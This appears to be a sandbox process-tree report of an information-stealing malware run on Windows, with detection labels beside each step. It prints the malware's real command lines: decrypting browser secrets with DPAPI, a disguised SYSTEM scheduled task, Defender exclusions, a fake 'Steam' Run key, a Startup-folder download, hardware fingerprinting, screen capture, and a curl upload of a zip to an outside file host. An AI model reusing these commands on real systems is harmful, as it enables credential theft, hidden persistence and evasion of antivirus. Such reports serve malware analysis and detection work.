C:\Windows\system32\cmd.exe /d /s /c "powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')"
2⤵
- An obfuscated cmd.exe command-line is typically used to evade detection.
- Suspicious use of WriteProcessMemory
PID:1620

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe Add-Type -AssemblyName System.Security; [System.Security.Cryptography.ProtectedData]::Unprotect([byte[]]@(1,0,0,0,208,140,157,223,1,21,209,17,140,122,0,192,79,194,151,235,1,0,0,0,158,56,123,155,119,128,226,65,189,77,45,80,19,37,26,47,16,0,0,0,10,0,0,0,69,0,100,0,103,0,101,0,0,0,16,102,0,0,0,1,0,0,32,0,0,0,204,23,200,182,199,212,101,234,51,160,20,157,150,146,144,151,39,93,3,161,164,186,212,226,57,101,160,86,167,155,8,7,0,0,0,0,14,128,0,0,0,2,0,0,32,0,0,0,184,144,186,180,174,237,163,184,95,232,101,63,21,177,75,98,215,199,36,30,80,192,146,63,77,115,21,70,102,42,166,165,48,0,0,0,117,126,67,77,96,159,142,116,174,11,86,56,11,231,226,145,7,63,8,207,34,20,54,206,115,112,214,184,19,252,2,122,95,58,116,12,104,15,223,163,49,195,63,147,96,226,86,246,64,0,0,0,114,72,103,37,120,230,180,221,228,136,240,64,66,22,120,71,192,126,130,46,213,57,1,27,188,210,151,225,138,111,6,223,99,131,127,243,133,142,61,229,60,15,180,41,8,227,3,169,15,181,32,167,8,219,218,233,217,48,253,19,227,158,119,122), $null, 'CurrentUser')
3⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3500

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic diskdrive get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:3604

C:\Windows\System32\Wbem\WMIC.exe
wmic diskdrive get serialnumber
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f"
2⤵
- Suspicious use of WriteProcessMemory
PID:4592

C:\Windows\system32\reg.exe
reg delete "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v Steam /f
3⤵
PID:3156

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM"
2⤵
- Suspicious use of WriteProcessMemory
PID:1216

C:\Windows\system32\schtasks.exe
schtasks /create /tn "GoogleUpdateTaskMachineUAC" /tr "cscript //nologo C:\ProgramData\edge\Updater\RunBatHidden.vbs" /sc minute /mo 10 /f /RU SYSTEM
3⤵
- Creates scheduled task(s)
PID:3176

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1""
2⤵
- Suspicious use of WriteProcessMemory
PID:4416

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass -File "C:\ProgramData\edge\Updater\Get-Clipboard.ps1"
3⤵
- Command and Scripting Interpreter: PowerShell
- Adds Run key to start application
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4468

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\zkdvhlze\zkdvhlze.cmdline"
4⤵
PID:3188

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES5033.tmp" "c:\Users\Admin\AppData\Local\Temp\zkdvhlze\CSCD3CE7D9BEC44CAB9597C04EED9AFD78.TMP"
5⤵
PID:228

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
- Suspicious use of WriteProcessMemory
PID:4792

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
- Suspicious use of AdjustPrivilegeToken
PID:4508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs""
2⤵
- Suspicious use of WriteProcessMemory
PID:5044

C:\Windows\system32\cscript.exe
cscript //nologo "C:\ProgramData\edge\Updater\RunBatHidden.vbs"
3⤵
- Checks computer location settings
PID:3416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\edge\Updater\CheckEpicGamesLauncher.bat" "
4⤵
PID:3344

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:3692

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Roaming\Microsoft\Windows"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1484

C:\Windows\system32\reg.exe
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam" /t REG_SZ /d "C:\Users\Admin\AppData\Local\Temp\PlutoBETA.2\PlutoBETA.exe" /f
5⤵
- Adds Run key to start application
- Modifies registry key
PID:3136

C:\Windows\system32\reg.exe
reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v "Steam"
5⤵
- Modifies registry key
PID:2332

C:\Windows\system32\curl.exe
curl -o "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Steam_Service.exe" YOUR-BINDED-EXE-LINK-HERE
5⤵
PID:2552

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic baseboard get serialnumber"
2⤵
- Suspicious use of WriteProcessMemory
PID:3652

C:\Windows\System32\Wbem\WMIC.exe
wmic baseboard get serialnumber
3⤵
PID:2588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
- Suspicious use of WriteProcessMemory
PID:2320

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:3936

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_computersystemproduct get uuid"
2⤵
PID:4612

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_computersystemproduct get uuid
3⤵
PID:464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:3556

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic PATH Win32_VideoController GET Description,PNPDeviceID"
2⤵
PID:2552

C:\Windows\System32\Wbem\WMIC.exe
wmic PATH Win32_VideoController GET Description,PNPDeviceID
3⤵
PID:5080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3088

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic memorychip get serialnumber"
2⤵
PID:3872

C:\Windows\System32\Wbem\WMIC.exe
wmic memorychip get serialnumber
3⤵
PID:1588

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4536

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:1216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic csproduct get uuid"
2⤵
PID:1044

C:\Windows\System32\Wbem\WMIC.exe
wmic csproduct get uuid
3⤵
PID:680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic cpu get processorid"
2⤵
PID:920

C:\Windows\System32\Wbem\WMIC.exe
wmic cpu get processorid
3⤵
PID:4480

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3100

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:2668

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "getmac /NH"
2⤵
PID:964

C:\Windows\system32\getmac.exe
getmac /NH
3⤵
PID:2320

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:3056

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:708

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:464

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:2056

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4116

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4796

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
- Blocklisted process makes network request
PID:4572

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:228

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:872

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:696

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1016

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:804

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:3100

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:3956

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4556

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4508

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4328

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:464

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:1096

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:4980

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:2612

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:3828

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2796

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2616

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4116

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3988

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:3208

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4800

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:2576

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:680

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:5036

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:2416

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4184

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:3780

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1152

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1""
2⤵
PID:4032

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -File "C:\Users\Admin\AppData\Local\Temp\CaptureScreens.ps1"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:1272

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Snfvgqlu.zip";"
2⤵
PID:1072

C:\Windows\system32\curl.exe
curl --location --request POST "https://api.filedoge.com/upload" -H "Content-Type: multipart/form-data;" --form "file=@C:/ProgramData/Steam/Launcher/EN-Snfvgqlu.zip";
3⤵
PID:1728

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:964

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4928

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4792

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:1148

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:2368

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:2204

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:3256

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:3384

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2556

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1576

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:1768

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:2484

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2492

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:1392

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:5080

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4352

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:2020

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:1164

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:5032

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:2260

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:3156

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:1588

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
- Blocklisted process makes network request
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:684

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:1536

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4980

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:2876

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2296

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:4572

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:3192

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:880

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4756

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4376

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:444

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:212

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:4512

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:1484

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1464

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:2484

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:1912

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:1392

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:2020

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4412

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:3996

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:4704

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:3828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:3080

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:1556

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:1040

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2704

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4436

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:2876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4060

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:696

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:2204

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:884

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:880

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4756

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:856

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:872

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:2708

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4776

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:3468

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:3160

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:5052

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:2056

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:3992

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:4352

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4800

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:4132

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:2764

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:2616

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:1564

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:232

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:4332

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:2216

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:3124

C:\Windows\System32\Wbem\WMIC.exe
wmic bios get smbiosbiosversion
3⤵
PID:1060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic MemoryChip get /format:list | find /i "Speed""
2⤵
PID:3844

C:\Windows\System32\Wbem\WMIC.exe
wmic MemoryChip get /format:list
3⤵
PID:4716

C:\Windows\system32\find.exe
find /i "Speed"
3⤵
PID:1828

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic path win32_VideoController get name"
2⤵
PID:708

C:\Windows\System32\Wbem\WMIC.exe
wmic path win32_VideoController get name
3⤵
- Detects videocard installed
PID:4060

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "rmdir /s /q "C:/ProgramData/Steam/Launcher""
2⤵
PID:3416

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName"
2⤵
PID:4488

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion' -Name ProductName
3⤵
- Suspicious behavior: EnumeratesProcesses
PID:4700

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "curl http://api.ipify.org/ --ssl-no-revoke"
2⤵
PID:2164

C:\Windows\system32\curl.exe
curl http://api.ipify.org/ --ssl-no-revoke
3⤵
PID:4264

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /d /s /c "wmic bios get smbiosbiosversion"
2⤵
PID:1912

